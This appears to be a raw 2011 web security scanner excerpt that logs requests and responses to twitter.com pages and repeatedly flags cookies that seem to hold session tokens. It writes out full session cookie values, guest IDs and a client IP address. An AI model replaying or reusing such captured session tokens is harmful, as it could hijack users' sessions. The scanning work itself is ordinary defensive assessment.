_twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 404 Not Found Date: Sat, 29 Jan 2011 01:53:26 GMT Server: hi Status: 404 Not Found X-Transaction: 1296266005-54049-23523 Last-Modified: Sat, 29 Jan 2011 01:53:25 GMT Content-Type: text/html; charset=utf-8 Content-Length: 9230 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIiRodHRwOi8vdHdpdHRlci5jb20vbGluZGFwaXp6%250AdXRpOgx0el9uYW1lIhRDZW50cmFsIEFtZXJpY2E6DGNzcmZfaWQiJWFiYzQ1%250ANWM5YjQ1NWJjMzdkMGZkMjlmMjZhNWUzMTFjOhVpbl9uZXdfdXNlcl9mbG93%250AMDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFz%250AaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpA%250AdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--178659bc16aec601c68a4ccb180ddd6c5bcd3dc3; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /login HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:25:36 GMT Server: hi Status: 200 OK X-Transaction: 1296224736-89084-19137 ETag: "849e44ccdc2da8651621c818bd6cc65c" Last-Modified: Fri, 28 Jan 2011 14:25:36 GMT X-Runtime: 0.03302 Content-Type: text/html; charset=utf-8 Content-Length: 12714 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlYzhmZTI4YjQwNmVmYjgxZGY5YWI0MGFkNWYyNjIx%250AOWI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--54109c50eed6759247aa1ca10510e42039e66977; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /malsup HTTP/1.1 Host: twitter.com Proxy-Connection: keep-alive Referer: http://malsup.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: guest_id=129452629042599503; k=173.193.214.243.1295994766153789
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 14:04:16 GMT Server: hi Status: 200 OK X-Transaction: 1296223456-14164-3404 ETag: "369af92da7b575f3f9e1aeeb54e34e15"-gzip Last-Modified: Fri, 28 Jan 2011 14:04:16 GMT X-Runtime: 0.01613 Content-Type: text/html; charset=utf-8 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; path=/ Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close Content-Length: 49593
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /malsup/favorites HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:28:31 GMT Server: hi Status: 200 OK X-Transaction: 1296224911-48509-36720 ETag: "aa813f25e26e58a8fc00a80271530b6f" Last-Modified: Fri, 28 Jan 2011 14:28:31 GMT X-Runtime: 0.28607 Content-Type: text/html; charset=utf-8 Content-Length: 57347 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlOWM3MDM0NDIyYzY2M2ZkMzM0YWE1NDgwMzg1NWRh%250AM2U6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--316ed1acac7dec68e9460d11f94a8de8f6191911; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /malsup/followers HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 302 Found Date: Fri, 28 Jan 2011 14:28:28 GMT Server: hi Status: 302 Found Location: http://twitter.com/login?redirect_after_login=%2Fmalsup%2Ffollowers X-Runtime: 0.00329 Content-Type: text/html; charset=utf-8 Content-Length: 133 Cache-Control: no-cache, max-age=300 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CToOcmV0dXJuX3RvIihodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL2Zv%250AbGxvd2VyczoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0%250AIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNo%250AewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--4024847b7caa44727b74ae89efd07cb29e96d23b; domain=.twitter.com; path=/ Expires: Fri, 28 Jan 2011 14:33:25 GMT X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<html><body>You are being <a href="http://twitter.com/login?redirect_after_login=%2Fmalsup%2Ffollowers">redirected</a>.</body></html>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /malsup/following HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 302 Found Date: Fri, 28 Jan 2011 14:28:26 GMT Server: hi Status: 302 Found Location: http://twitter.com/login?redirect_after_login=%2Fmalsup%2Ffollowing X-Runtime: 0.00243 Content-Type: text/html; charset=utf-8 Content-Length: 133 Cache-Control: no-cache, max-age=300 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CToOcmV0dXJuX3RvIihodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL2Zv%250AbGxvd2luZzoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0%250AIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNo%250AewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--148959b3be71f317b0f559b6a54c3a0c718e618f; domain=.twitter.com; path=/ Expires: Fri, 28 Jan 2011 14:33:24 GMT X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<html><body>You are being <a href="http://twitter.com/login?redirect_after_login=%2Fmalsup%2Ffollowing">redirected</a>.</body></html>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /malsup/lists/memberships HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:28:30 GMT Server: hi Status: 200 OK X-Transaction: 1296224909-80319-15886 ETag: "c8e3bcf74656418e1966d131ca1712ec" Last-Modified: Fri, 28 Jan 2011 14:28:29 GMT X-Runtime: 0.29750 Content-Type: text/html; charset=utf-8 Content-Length: 53194 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlOTY3NDUzZWYzNmZkNjRmZmZhNWVmMDJlMjczNTIz%250AYWI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d2b7d333c4ae3616cea1972ad8fcfbf90f4504; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /malsup/status/28104072506638336 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:28:22 GMT Server: hi Status: 200 OK X-Transaction: 1296224902-83509-7686 ETag: "149ada5c80b5766764f47c9a0f52a4c1" Last-Modified: Fri, 28 Jan 2011 14:28:22 GMT X-Runtime: 0.06341 Content-Type: text/html; charset=utf-8 Content-Length: 13677 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODEwNDA3MjUwNjYzODMzNjoMY3NyZl9pZCIlNWNkZDU3ZjRlMjQy%250AN2Q4MTA4MmM0NDFhZDg5MjY2YzI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--e0b142d583ea9a31999ba97ee4a16fb9f6b484a2; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /malsup/status/28148269980852225 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:28:21 GMT Server: hi Status: 200 OK X-Transaction: 1296224901-67249-7024 ETag: "c7d9e91873275c60e828220131e3d24e" Last-Modified: Fri, 28 Jan 2011 14:28:21 GMT X-Runtime: 0.05497 Content-Type: text/html; charset=utf-8 Content-Length: 13572 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODE0ODI2OTk4MDg1MjIyNToMY3NyZl9pZCIlMjhjNDM2MTNkMDIw%250ANDA2NjMwMjM2MDE1YmViMWNhOWI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--53ddf4f09f23d5fa1c2283d7064ce993e37290a9; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /malsup/status/28172705220009984 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:28:23 GMT Server: hi Status: 200 OK X-Transaction: 1296224903-20411-54978 ETag: "1d3dce7c8cc9257454fd818d254f7abb" Last-Modified: Fri, 28 Jan 2011 14:28:23 GMT X-Runtime: 0.29056 Content-Type: text/html; charset=utf-8 Content-Length: 13615 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODE3MjcwNTIyMDAwOTk4NDoMY3NyZl9pZCIlNDAwZTU3MDIwZTI2%250AOGRjM2FkZTAwZDZiN2FkNDkxZTY6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--f11730b84ce50cbf6bd93caab79b94724f2f389a; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /malsup/status/28172927228706816 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:28:17 GMT Server: hi Status: 200 OK X-Transaction: 1296224897-95647-22549 ETag: "9e559c9fc45aceb0c6ca126ade823c32" Last-Modified: Fri, 28 Jan 2011 14:28:17 GMT X-Runtime: 0.05413 Content-Type: text/html; charset=utf-8 Content-Length: 13565 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODE3MjkyNzIyODcwNjgxNjoMY3NyZl9pZCIlMThlMTViODg0ZThh%250AZWQxZDY1MTRiYmFiYmUzNzlmNTU6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--c8db7209ce1246cbe1047e0cb576ed58c5085c73; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /malsup/status/28176483855896578 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:27:53 GMT Server: hi Status: 200 OK X-Transaction: 1296224873-94611-54894 ETag: "9b55cdcf81cadef11b9b4336e0d1dfae" Last-Modified: Fri, 28 Jan 2011 14:27:53 GMT X-Runtime: 0.33314 Content-Type: text/html; charset=utf-8 Content-Length: 13615 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODE3NjQ4Mzg1NTg5NjU3ODoMY3NyZl9pZCIlYmEwMDczN2YyZjhl%250AZGZlZDk2OGM2ZmRjZDJmZTM1N2M6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--2a2ab9129448d1d35a9123d4379ea42935434e7c; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /malsup/status/28206363616215040 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
